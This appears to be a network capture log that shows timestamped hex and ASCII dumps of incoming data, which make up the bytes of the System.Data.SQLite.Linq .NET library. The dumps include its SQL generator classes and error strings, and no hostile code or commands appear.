2023-11-18 09:02:37 UTC	626	IN	Data Raw: 03 6f 9c 00 00 0a 6f 98 01 00 06 2a ce 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 02 03 6f 9e 00 00 0a 6f 97 01 00 06 02 03 6f 9f 00 00 0a 6f 97 01 00 06 02 03 6f a0 00 00 0a 6f 97 01 00 06 2a 9e 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 02 03 6f a1 00 00 0a 6f 97 01 00 06 02 03 6f f1 00 00 0a 6f 97 01 00 06 2a 3e 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 2a ce 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 02 03 6f a3 00 00 0a 6f 99 01 00 06 02 03 6f a4 00 00 0a 6f 97 01 00 06 02 03 6f a3 00 00 0a 6f 98 01 00 06 2a ce 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 02 03 6f a6 00 00 0a 6f 99 01 00 06 02 03 6f a7 00 00 0a 6f 97 01 00 06 02 03 6f a6 00 00 0a 6f 98 01 00 06 2a 6e 03 2d 0b 72 4a 20 00 70 73 60 01 00 0a 7a 02 03 6f a8 00 00 0a 6f 97 01 00 06 2a 00 1b 30 Data Ascii: oo-rJ ps`zoooooo-rJ ps`zoooo>-rJ ps`z-rJ ps`zoooooo-rJ ps`zoooooon-rJ ps`zoo*0
2023-11-18 09:02:37 UTC	627	IN	Data Raw: 7d be 01 00 0a 2a 00 00 1b 30 02 00 1b 00 00 00 40 00 00 11 02 7b bc 01 00 0a 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 bf 01 00 0a dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 03 00 9e 00 00 00 59 00 00 11 02 7b bc 01 00 0a 0b 07 2c 0b 07 17 2e 5c 16 0a dd 87 00 00 00 02 15 7d bc 01 00 0a 02 7b 59 00 00 0a 7b 51 00 00 0a 02 7b c0 01 00 0a 12 02 6f 52 00 00 0a 2c 5b 02 08 6f c1 01 00 0a 7d c2 01 00 0a 02 1f fd 7d bc 01 00 0a 2b 26 02 7c c2 01 00 0a 28 c3 01 00 0a 0d 02 09 7d c4 01 00 0a 02 17 7d bc 01 00 0a 17 0a de 32 02 1f fd 7d bc 01 00 0a 02 7c c2 01 00 0a 28 c5 01 00 0a 2d cd 02 28 bf 01 00 0a 02 7c c2 01 00 0a fe 15 57 00 00 1b 16 0a de 07 02 28 c6 01 00 0a dc 06 2a 00 00 01 10 00 00 04 00 00 00 95 95 00 07 00 00 00 00 66 02 15 Data Ascii: }0@{.3(0Y{,.\}{Y{Q{oR,[o}}+&\|(}}2}\|(-(\|W(*f
2023-11-18 09:02:37 UTC	627	IN	Data Raw: 00 0a 1f fe 33 18 02 7b be 01 00 0a 28 bd 01 00 0a 33 0b 02 16 7d bc 01 00 0a 02 0a 2b 13 16 73 58 00 00 0a 0a 06 02 7b 59 00 00 0a 7d 59 00 00 0a 06 02 7b 5a 00 00 0a 7d c0 01 00 0a 06 2a 1e 02 28 c7 01 00 0a 2a 66 02 28 44 00 00 0a 02 03 7d c8 01 00 0a 02 28 bd 01 00 0a 7d c9 01 00 0a 2a 00 00 00 1b 30 02 00 33 00 00 00 40 00 00 11 02 7b c8 01 00 0a 0a 06 1f fc 2e 09 06 1f fd 2e 04 06 17 33 1d 00 06 1f fc 2e 06 06 17 2e 02 de 11 00 de 0e 02 28 ca 01 00 0a dc 02 28 cb 01 00 0a dc 2a 00 01 1c 00 00 02 00 22 00 02 24 00 07 00 00 00 00 02 00 16 00 15 2b 00 07 00 00 00 00 1b 30 03 00 d0 00 00 00 5b 00 00 11 02 7b c8 01 00 0a 0b 07 2c 0b 07 17 2e 79 16 0a dd b9 00 00 00 02 15 7d c8 01 00 0a 02 02 7b 63 00 00 0a 6f 5e 00 00 0a 6f 5f 00 00 0a 7d cc 01 00 0a 02 Data Ascii: 3{(3}+sX{Y}Y{Z}(f(D}(}03@{..3..(("$+0[{,.y}{co^o_}
2023-11-18 09:02:37 UTC	629	IN	Data Raw: 00 00 00 2e 00 00 00 3c 00 00 00 10 00 00 00 58 00 00 00 01 00 00 00 01 00 00 00 07 00 00 00 05 00 00 00 0a 00 00 00 0e 00 00 00 13 00 00 00 01 00 00 00 00 00 ad 16 01 00 00 00 00 00 06 00 ba 10 65 28 06 00 8e 11 65 28 06 00 ba 0f ba 27 0f 00 be 28 00 00 06 00 fb 0f 13 1f 06 00 9d 10 13 1f 06 00 75 11 13 1f 06 00 f7 10 13 1f 06 00 10 11 13 1f 06 00 7e 10 13 1f 06 00 e7 0f 1c 28 06 00 2b 11 82 18 06 00 92 35 b0 22 06 00 90 23 b0 22 06 00 da 10 b0 22 06 00 61 10 13 1f 06 00 30 10 7e 13 06 00 e5 2d 82 18 0a 00 bd 05 cd 28 06 00 31 01 da 02 0e 00 82 25 d4 22 06 00 89 24 f4 34 06 00 0c 01 da 02 0a 00 13 0e cd 28 0a 00 d1 05 cd 28 0a 00 15 06 cd 28 0a 00 3d 0e cd 28 0a 00 94 23 45 18 0a 00 7b 0d 45 18 0a 00 91 00 45 18 0a 00 6d 04 45 18 7b 00 24 27 00 00 0a 00 Data Ascii: .<Xe(e('(u~(+5"#""a0~-(1%"$4(((=(#E{EEmE{$'
2023-11-18 09:02:37 UTC	630	IN	Data Raw: 49 00 02 00 09 00 a0 00 00 00 a4 30 61 23 00 00 02 00 0e 00 00 01 10 00 38 17 61 23 3c 00 02 00 0f 00 00 01 10 00 7b 01 61 23 0c 00 07 00 18 00 80 01 10 00 e3 2b 61 23 49 00 08 00 24 00 00 00 10 00 28 0e 61 23 49 00 13 00 41 00 00 01 10 00 a5 24 61 23 49 00 14 00 45 00 00 01 10 00 f5 24 61 23 0e 00 15 00 4b 00 00 01 10 00 32 27 61 23 12 00 15 00 81 00 00 01 10 00 4d 30 61 23 49 00 21 00 fe 00 00 00 10 00 fd 25 61 23 09 02 2d 00 12 01 80 01 10 00 a2 16 61 23 49 00 2f 00 17 01 00 00 10 00 3c 17 61 23 49 00 30 00 2b 01 00 00 10 00 84 26 61 23 49 00 36 00 37 01 00 01 10 00 43 07 61 23 49 00 38 00 39 01 00 00 10 00 33 0e 61 23 49 00 39 00 3e 01 01 01 10 00 ce 36 61 23 11 02 3b 00 43 01 00 01 10 00 f6 32 61 23 2d 02 3d 00 50 01 00 01 10 00 4e 28 61 23 41 02 41 Data Ascii: I0a#8a#<{a#+a#I$(a#IA$a#IE$a#K2'a#M0a#I!%a#-a#I/<a#I0+&a#I67Ca#I893a#I9>6a#;C2a#-=PN(a#AA
2023-11-18 09:02:37 UTC	631	IN	Data Raw: 00 83 00 c8 35 83 02 24 00 cc 28 00 00 00 00 83 00 b8 35 46 01 25 00 dc 28 00 00 00 00 c3 02 68 14 3c 0f 26 00 70 29 00 00 00 00 83 00 c2 35 8f 0f 27 00 9b 29 00 00 00 00 83 08 11 2a 9d 0f 29 00 ab 29 00 00 00 00 83 08 62 2d 67 02 29 00 b8 29 00 00 00 00 83 08 29 2c a7 0f 29 00 c0 29 00 00 00 00 93 00 ed 0b bc 0f 29 00 cd 29 00 00 00 00 93 00 b8 06 c5 0f 2a 00 e9 29 00 00 00 00 93 00 4c 29 ce 0f 2b 00 f8 29 00 00 00 00 93 00 4c 29 dc 0f 2c 00 45 2a 00 00 00 00 93 00 10 0c ea 0f 2d 00 52 2a 00 00 00 00 93 00 10 0c f1 0f 2e 00 5d 2a 00 00 00 00 93 00 ba 0b ea 0f 2f 00 6a 2a 00 00 00 00 93 00 ba 0b f1 0f 30 00 76 2a 00 00 00 00 93 00 62 0c ea 0f 31 00 83 2a 00 00 00 00 93 00 62 0c f1 0f 32 00 8f 2a 00 00 00 00 93 00 67 04 f8 0f 33 00 c4 2a 00 00 00 00 93 00 Data Ascii: 5$(5F%(h<&p)5')))b-g))),)))))L)+)L),E-R.]/j0vb1b2g3
2023-11-18 09:02:37 UTC	633	IN	Data Raw: 00 00 00 00 81 00 61 33 1a 12 90 00 9e 33 00 00 00 00 81 00 34 1e 26 12 91 00 ac 33 00 00 00 00 81 08 60 30 2d 12 92 00 b9 33 00 00 00 00 81 08 95 19 29 00 92 00 d5 33 00 00 00 00 83 08 85 29 32 12 92 00 dd 33 00 00 00 00 83 08 5a 29 32 12 92 00 e8 33 00 00 00 00 81 00 e9 18 3c 12 92 00 64 34 00 00 00 00 91 00 9f 2b 4d 12 94 00 f0 34 00 00 00 00 91 00 60 2b 4d 12 94 00 78 37 00 00 00 00 91 00 ef 27 58 12 94 00 44 39 00 00 00 00 91 00 45 36 58 12 94 00 bc 39 00 00 00 00 81 18 6c 27 62 12 94 00 d8 39 00 00 00 00 93 00 7d 17 68 12 95 00 60 3a 00 00 00 00 81 00 7d 17 7c 12 99 00 04 3b 00 00 00 00 81 00 b9 17 83 12 9a 00 74 3b 00 00 00 00 81 00 9b 17 8e 12 9c 00 c0 3b 00 00 00 00 81 00 c0 18 94 12 9d 00 9c 3d 00 00 00 00 c6 00 f5 2e 9e 12 9f 00 b5 3d 00 00 00 Data Ascii: a334&3`0-3)3)23Z)23<d4+M4`+Mx7'XD9E6X9l'b9}h`:}\|;t;;=.=
2023-11-18 09:02:37 UTC	634	IN	Data Raw: 01 58 65 00 00 00 00 81 00 b8 2a a3 14 1a 01 e0 65 00 00 00 00 81 00 1f 17 ae 14 1b 01 ec 65 00 00 00 00 81 00 1f 17 b7 14 1e 01 60 66 00 00 00 00 81 00 6b 2d c1 14 22 01 04 67 00 00 00 00 81 00 7b 30 cf 14 24 01 14 67 00 00 00 00 81 00 7b 30 dd 14 28 01 ca 67 00 00 00 00 91 00 d0 29 ec 14 2d 01 dc 67 00 00 00 00 91 00 59 0f f3 14 2e 01 00 68 00 00 00 00 81 00 6e 0b f9 14 30 01 6c 6a 00 00 00 00 81 00 43 1d f6 12 31 01 a9 6a 00 00 00 00 81 00 10 1e fd 10 32 01 c0 6a 00 00 00 00 81 00 fa 18 fd 10 33 01 e2 6a 00 00 00 00 81 00 a8 1b fd 10 34 01 10 6b 00 00 00 00 81 00 c3 1d fd 10 35 01 38 6b 00 00 00 00 81 00 a8 07 00 15 36 01 a0 6c 00 00 00 00 81 00 13 2d 09 15 38 01 c6 6c 00 00 00 00 81 00 44 03 09 15 3a 01 02 6d 00 00 00 00 93 00 e5 24 12 15 3c 01 24 6d Data Ascii: Xe*ee`fk-"g{0$g{0(g)-gY.hn0ljC1j2j3j4k58k6l-8lD:m$<$m
2023-11-18 09:02:37 UTC	635	IN	Data Raw: 42 0f 9b 01 f6 7b 00 00 00 00 86 18 6c 27 06 00 9d 01 fe 7b 00 00 00 00 c6 00 13 04 4b 16 9d 01 0b 7c 00 00 00 00 c6 00 03 24 51 16 9d 01 18 7c 00 00 00 00 c6 00 b7 1f 57 16 9d 01 25 7c 00 00 00 00 c6 00 47 24 5d 16 9d 01 32 7c 00 00 00 00 c6 00 37 26 63 16 9d 01 3f 7c 00 00 00 00 c6 00 8e 25 69 16 9d 01 4c 7c 00 00 00 00 e6 01 31 05 6e 16 9d 01 0d 7d 00 00 00 00 e6 01 05 0e 06 00 9e 01 1c 7d 00 00 00 00 81 00 73 03 06 00 9e 01 3b 7d 00 00 00 00 81 00 05 0e 15 00 9e 01 4c 7d 00 00 00 00 c4 00 9e 12 06 00 9f 01 7c 7d 00 00 00 00 91 18 72 27 38 0f 9f 01 88 7d 00 00 00 00 86 18 6c 27 10 00 9f 01 a6 7d 00 00 00 00 91 00 0d 33 75 16 a0 01 b4 7d 00 00 00 00 91 00 6a 19 12 15 a0 01 05 7e 00 00 00 00 91 00 4f 19 7b 16 a1 01 10 7e 00 00 00 00 83 00 0f 2b 86 16 a2 Data Ascii: B{l'{K\|$Q\|W%\|G$]2\|7&c?\|%iL\|1n}}s;}L}\|}r'8}l'}3u}j~O{~+
2023-11-18 09:02:37 UTC	637	IN	Data Raw: 00 e6 11 9a 18 f9 01 2b 96 00 00 00 00 c6 00 f5 2e a4 18 fb 01 4a 96 00 00 00 00 c6 00 f5 2e ab 18 fc 01 78 96 00 00 00 00 c6 00 f5 2e b2 18 fd 01 ac 96 00 00 00 00 c6 00 f5 2e b9 18 fe 01 03 97 00 00 00 00 c6 00 f5 2e c0 18 ff 01 1c 97 00 00 00 00 c6 00 f5 2e c7 18 00 02 30 97 00 00 00 00 c6 00 f5 2e ce 18 01 02 98 97 00 00 00 00 81 00 28 36 d5 18 02 02 ec 97 00 00 00 00 86 18 6c 27 01 00 04 02 08 98 00 00 00 00 e1 01 f2 0d 06 00 05 02 40 98 00 00 00 00 e1 01 eb 34 29 00 05 02 fc 98 00 00 00 00 81 00 43 01 06 00 05 02 16 99 00 00 00 00 e1 09 63 31 12 0b 05 02 ba 43 00 00 00 00 e1 01 4f 2e 06 00 05 02 1e 99 00 00 00 00 e1 09 9e 31 39 00 05 02 2c 99 00 00 00 00 e1 01 c5 26 fb 0c 05 02 7b 99 00 00 00 00 e1 01 02 27 4e 00 05 02 83 99 00 00 00 00 86 18 6c 27 Data Ascii: +.J.x....0.(6l'@4)Cc1CO.19,&{'Nl'
2023-11-18 09:02:37 UTC	638	IN	Data Raw: 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 fd 0e 00 00 01 00 57 34 00 00 01 00 b5 27 00 00 01 00 c5 1e 00 00 01 00 32 13 00 00 01 00 57 34 00 00 01 00 57 34 00 00 01 00 10 25 00 00 02 00 57 34 00 00 01 00 66 0e 00 00 01 00 57 34 00 00 01 00 b5 27 00 00 01 00 aa 12 00 00 02 00 53 2a 00 00 01 00 22 33 00 00 01 00 22 33 00 00 02 00 49 06 02 00 03 00 1e 2c 02 00 04 00 fe 0a 00 00 01 00 49 Data Ascii: W4'2W4W4%W4fW4'S*"3"3I,I
2023-11-18 09:02:37 UTC	639	IN	Data Raw: 52 2d 00 00 02 00 9c 04 00 00 03 00 03 14 00 00 04 00 75 21 00 00 01 00 bd 30 00 00 02 00 7a 2f 00 00 03 00 e5 34 00 00 04 00 85 32 00 00 01 00 aa 12 00 00 01 00 b9 2e 00 00 02 00 e5 2e 00 00 03 00 af 26 00 00 01 00 aa 12 00 00 01 00 aa 12 00 00 01 00 aa 12 00 00 01 00 aa 12 00 00 02 00 c1 08 00 00 01 00 aa 12 00 00 02 00 7a 2f 00 00 01 00 aa 12 00 00 01 00 aa 12 00 00 01 00 da 2b 00 00 02 00 aa 12 00 00 01 00 aa 12 00 00 02 00 81 2c 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 Data Ascii: R-u!0z/42..&z/+,
2023-11-18 09:02:37 UTC	640	IN	Data Raw: 32 00 00 01 00 66 12 00 00 01 00 7e 2d 00 00 01 00 11 35 00 00 02 00 3d 06 00 00 03 00 30 2a 00 00 04 00 d9 04 00 00 01 00 66 12 00 00 02 00 83 0c 00 00 01 00 66 12 00 00 02 00 e7 0a 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 Data Ascii: 2f~-5=0*ff
2023-11-18 09:02:37 UTC	641	IN	Data Raw: cb 02 49 03 35 29 dd 02 dc 00 07 12 ef 02 51 03 b8 11 39 00 31 05 b3 2d f8 02 61 05 6c 27 10 00 31 01 4d 2c 04 03 e4 00 07 12 ef 02 59 03 b8 11 39 00 59 03 63 03 29 00 f1 03 1e 2b 16 03 61 03 c8 2f 29 00 ec 00 21 27 45 00 f4 00 bd 31 34 00 61 03 fa 08 c7 00 31 05 08 37 42 03 fc 00 21 27 45 00 31 05 89 2a 5f 03 31 03 1d 08 c7 00 f9 04 1c 0d 6c 03 19 05 49 14 72 03 81 05 53 0f 10 00 04 01 6c 27 06 00 04 01 40 03 d2 01 04 01 13 32 e8 00 04 01 21 27 b8 01 0c 01 bd 31 34 00 81 05 53 0f 93 03 61 05 6c 27 06 00 0c 01 eb 34 29 00 1c 00 6c 27 06 00 49 01 73 2c 98 03 51 01 2b 19 98 03 51 01 22 19 98 03 51 01 e9 0d 90 00 61 01 47 2d a8 03 99 01 94 2e 90 00 99 01 be 2e 90 00 91 00 2e 0c b7 03 e9 02 74 08 c7 00 a1 01 db 34 9c 00 a1 01 7f 0e 90 00 a9 01 73 2c 98 03 b1 Data Ascii: I5)Q91-al'1M,Y9Yc)+a/)!'E14a17B!'E1*_1lIrSl'@2!'14Sal'4)l'Is,Q+Q"QaG-...t4s,
2023-11-18 09:02:37 UTC	643	IN	Data Raw: 00 59 04 6c 27 6e 09 31 06 c2 11 73 06 91 04 23 14 75 09 39 06 7c 29 8b 09 91 04 b0 35 93 09 39 06 0d 0e a0 09 91 04 b3 18 a0 09 a1 05 11 19 ba 04 b1 04 83 21 26 06 b1 04 b3 13 26 06 b1 04 99 21 26 06 41 06 6c 27 10 00 31 05 92 2f c7 00 59 04 82 0b bf 09 44 02 07 12 6d 01 49 06 6c 27 10 00 31 01 a1 06 d5 09 31 01 8a 06 de 09 31 01 8a 06 e9 09 31 01 5c 06 f9 09 31 01 74 06 08 0a 31 01 74 06 14 0a 31 01 cc 06 1f 0a 31 01 cc 06 2a 0a 59 04 48 0b bf 09 44 02 5e 18 3b 02 e4 00 5e 18 b4 04 51 06 09 36 57 0a 51 06 20 18 5d 0a 69 04 ae 0e 64 0a 81 04 ce 21 73 0a 31 04 00 35 10 00 31 04 ee 0a b6 0a a9 03 0e 2c bd 0a 54 02 21 27 45 00 5c 02 bd 31 34 00 69 02 0e 2c eb 0a 64 02 a8 35 34 00 6c 02 07 12 ef 02 b9 04 14 08 c7 00 b9 04 4e 06 10 01 b9 04 79 05 07 0b 61 06 Data Ascii: Yl'n1s#u9\|)59!&&!&Al'1/YDmIl'1111\1t1t11*YHD^;^Q6WQ ]id!s151,T!'E\14i,d54lNya
2023-11-18 09:02:37 UTC	644	IN	Data Raw: 00 00 66 2c 78 19 00 00 47 37 46 19 00 00 64 30 80 19 00 00 99 19 46 19 00 00 89 29 85 19 00 00 5e 29 85 19 00 00 25 2e 46 19 00 00 ca 2c 32 19 00 00 9b 2c 32 19 00 00 ec 2c 8f 19 00 00 52 23 9a 19 00 00 38 23 9f 19 00 00 f7 2d a4 19 00 00 a9 18 a4 19 00 00 dc 0c a4 19 00 00 44 35 a4 19 00 00 58 35 a4 19 00 00 6e 34 46 19 00 00 e6 2f a9 19 00 00 d4 2a 3b 19 00 00 62 13 46 19 00 00 3c 33 46 19 00 00 f7 09 ad 19 00 00 be 09 ad 19 00 00 7e 0c b1 19 00 00 f1 28 46 19 00 00 4c 32 73 19 00 00 d5 24 b7 19 00 00 3c 0d bd 19 00 00 50 02 c3 19 00 00 6a 02 c3 19 00 00 12 2c c7 19 00 00 38 2a d0 19 00 00 05 31 dc 19 00 00 3c 31 e1 19 00 00 05 31 dc 19 00 00 3c 31 e1 19 02 00 0f 00 03 00 01 00 10 00 03 00 02 00 11 00 05 00 02 00 12 00 07 00 01 00 13 00 07 00 02 00 14 Data Ascii: f,xG7Fd0F)^)%.F,2,2,R#8#-D5X5n4F/;bF<3F~(FL2s$<Pj,81<11<1
2023-11-18 09:02:37 UTC	645	IN	Data Raw: 3e 64 5f 5f 31 31 00 3c 3e 39 5f 5f 33 31 5f 31 00 3c 54 72 79 54 72 61 6e 73 6c 61 74 65 49 6e 74 6f 49 6e 3e 62 5f 5f 33 31 5f 31 00 4e 75 6c 6c 61 62 6c 65 60 31 00 49 45 6e 75 6d 65 72 61 62 6c 65 60 31 00 53 74 61 63 6b 60 31 00 49 43 6f 6c 6c 65 63 74 69 6f 6e 60 31 00 52 65 61 64 4f 6e 6c 79 4d 65 74 61 64 61 74 61 43 6f 6c 6c 65 63 74 69 6f 6e 60 31 00 52 65 61 64 4f 6e 6c 79 43 6f 6c 6c 65 63 74 69 6f 6e 60 31 00 4c 69 73 74 45 6c 65 6d 65 6e 74 48 61 6e 64 6c 65 72 60 31 00 49 43 6f 6d 70 61 72 65 72 60 31 00 49 45 71 75 61 6c 69 74 79 43 6f 6d 70 61 72 65 72 60 31 00 54 6f 53 74 72 69 6e 67 43 6f 6e 76 65 72 74 65 72 60 31 00 49 45 6e 75 6d 65 72 61 74 6f 72 60 31 00 44 62 45 78 70 72 65 73 73 69 6f 6e 56 69 73 69 74 6f 72 60 31 00 49 4c 69 73 Data Ascii: >d__11<>9__31_1<TryTranslateIntoIn>b__31_1Nullable`1IEnumerable`1Stack`1ICollection`1ReadOnlyMetadataCollection`1ReadOnlyCollection`1ListElementHandler`1IComparer`1IEqualityComparer`1ToStringConverter`1IEnumerator`1DbExpressionVisitor`1ILis
2023-11-18 09:02:37 UTC	647	IN	Data Raw: 65 00 54 72 79 47 65 74 49 73 55 6e 69 63 6f 64 65 00 69 73 55 6e 69 63 6f 64 65 00 6d 6f 64 65 00 44 62 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 55 70 64 61 74 65 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 44 65 6c 65 74 65 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 4d 6f 64 69 66 69 63 61 74 69 6f 6e 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 46 75 6e 63 74 69 6f 6e 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 49 6e 73 65 72 74 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 51 75 65 72 79 43 6f 6d 6d 61 6e 64 54 72 65 65 00 5f 63 6f 6d 6d 61 6e 64 54 72 65 65 00 74 72 65 65 00 67 65 74 5f 54 79 70 65 55 73 61 67 65 00 43 72 65 61 74 65 44 61 74 65 54 69 6d 65 54 79 70 65 55 73 61 67 65 00 43 72 65 61 74 65 53 74 72 69 6e 67 54 79 70 65 55 73 61 67 65 00 43 72 65 Data Ascii: eTryGetIsUnicodeisUnicodemodeDbCommandTreeDbUpdateCommandTreeDbDeleteCommandTreeDbModificationCommandTreeDbFunctionCommandTreeDbInsertCommandTreeDbQueryCommandTree_commandTreetreeget_TypeUsageCreateDateTimeTypeUsageCreateStringTypeUsageCre
2023-11-18 09:02:37 UTC	651	IN	Data Raw: 63 68 65 6d 61 44 65 66 69 6e 69 74 69 6f 6e 2e 63 73 64 6c 00 53 79 73 74 65 6d 2e 44 61 74 61 2e 53 51 4c 69 74 65 2e 53 51 4c 69 74 65 50 72 6f 76 69 64 65 72 53 65 72 76 69 63 65 73 2e 53 74 6f 72 65 53 63 68 65 6d 61 44 65 66 69 6e 69 74 69 6f 6e 2e 73 73 64 6c 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 4f 62 6a 65 63 74 4d 6f 64 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 53 74 72 69 6e 67 55 74 69 6c 00 53 79 73 74 65 6d 2e 44 61 74 61 2e 53 51 4c 69 74 65 2e 4c 69 6e 71 2e 64 6c 6c 00 46 69 6c 6c 00 44 42 4e 75 6c 6c 00 53 79 73 74 65 6d 2e 58 6d 6c 00 53 79 73 74 65 6d 2e 44 61 74 61 2e 53 51 4c 69 74 65 2e 53 51 4c 69 74 65 50 72 6f 76 69 64 65 72 53 65 72 76 69 63 65 73 2e 50 72 6f 76 69 64 65 72 Data Ascii: chemaDefinition.csdlSystem.Data.SQLite.SQLiteProviderServices.StoreSchemaDefinition.ssdlSystem.Collections.ObjectModelSystem.ComponentModelStringUtilSystem.Data.SQLite.Linq.dllFillDBNullSystem.XmlSystem.Data.SQLite.SQLiteProviderServices.Provider
2023-11-18 09:02:37 UTC	655	IN	Data Raw: 6e 54 72 61 6e 73 6c 61 74 6f 72 00 74 72 61 6e 73 6c 61 74 6f 72 00 73 65 70 61 72 61 74 6f 72 00 49 45 6e 75 6d 65 72 61 74 6f 72 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e 75 6d 65 72 61 62 6c 65 3c 54 56 61 6c 75 65 3e 2e 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 49 45 6e 75 6d 65 72 61 62 6c 65 2e 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 00 44 6d 6c 53 71 6c 47 65 6e 65 72 61 74 6f 72 00 73 71 6c 47 65 6e 65 72 61 74 6f 72 00 48 61 6e 64 6c 65 53 70 65 63 69 61 6c 46 75 6e 63 74 69 6f 6e 54 6f 4f 70 65 72 61 74 6f 72 00 2e 63 74 6f 72 00 2e 63 63 74 6f 72 00 56 69 73 69 74 43 6f 6c 6c 65 63 74 69 6f 6e 43 6f 6e 73 74 72 75 63 74 6f 72 00 44 62 45 Data Ascii: nTranslatortranslatorseparatorIEnumeratorSystem.Collections.Generic.IEnumerable<TValue>.GetEnumeratorSystem.Collections.IEnumerable.GetEnumeratorDmlSqlGeneratorsqlGeneratorHandleSpecialFunctionToOperator.ctor.cctorVisitCollectionConstructorDbE
2023-11-18 09:02:37 UTC	659	IN	Data Raw: 6c 69 74 79 00 53 79 73 74 65 6d 2e 44 61 74 61 2e 45 6e 74 69 74 79 00 49 73 4e 75 6c 6c 4f 72 45 6d 70 74 79 00 67 65 74 5f 49 73 45 6d 70 74 79 00 67 65 74 5f 50 72 6f 70 65 72 74 79 00 54 72 79 47 65 74 56 61 6c 75 65 46 6f 72 4d 65 74 61 64 61 74 61 50 72 6f 70 65 72 74 79 00 45 64 6d 50 72 6f 70 65 72 74 79 00 00 00 1d 55 00 70 00 64 00 61 00 74 00 65 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 00 0f 55 00 50 00 44 00 41 00 54 00 45 00 20 00 00 09 53 00 45 00 54 00 20 00 00 05 2c 00 20 00 00 07 20 00 3d 00 20 00 00 09 20 00 3d 00 20 00 30 00 00 0d 57 00 48 00 45 00 52 00 45 00 20 00 00 03 3b 00 00 1d 44 00 65 00 6c 00 65 00 74 00 65 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 00 19 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 46 00 52 00 Data Ascii: litySystem.Data.EntityIsNullOrEmptyget_IsEmptyget_PropertyTryGetValueForMetadataPropertyEdmPropertyUpdateFunctionUPDATE SET , = = 0WHERE ;DeleteFunctionDELETE FR
2023-11-18 09:02:37 UTC	663	IN	Data Raw: 75 00 74 00 63 00 27 00 29 00 01 80 81 44 00 41 00 54 00 45 00 50 00 41 00 52 00 54 00 20 00 61 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 20 00 74 00 6f 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 27 00 7b 00 30 00 7d 00 2e 00 7b 00 31 00 7d 00 27 00 20 00 6d 00 75 00 73 00 74 00 20 00 62 00 65 00 20 00 61 00 20 00 6c 00 69 00 74 00 65 00 72 00 61 00 6c 00 20 00 73 00 74 00 72 00 69 00 6e 00 67 00 01 80 8b 7b 00 30 00 7d 00 27 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 61 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 76 00 61 00 6c 00 75 00 65 00 20 00 66 00 6f 00 72 00 20 00 44 00 41 00 54 00 45 00 50 00 41 00 52 00 54 00 20 00 61 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 20 00 69 00 6e 00 20 00 27 00 7b 00 31 00 7d 00 2e Data Ascii: utc')DATEPART argument to function '{0}.{1}' must be a literal string{0}' is not a valid value for DATEPART argument in '{1}.
